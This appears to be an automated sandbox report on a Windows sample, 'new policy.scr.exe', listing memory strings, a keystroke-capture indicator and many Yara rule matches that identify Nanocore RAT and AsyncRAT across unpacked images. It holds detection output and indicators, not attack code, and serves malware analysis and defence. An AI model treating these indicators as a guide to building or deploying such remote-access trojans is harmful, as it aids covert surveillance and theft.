Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.0000000002986000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Installs a raw input device (often for capturing keystrokes)

Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

memstr_a586111e-f

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
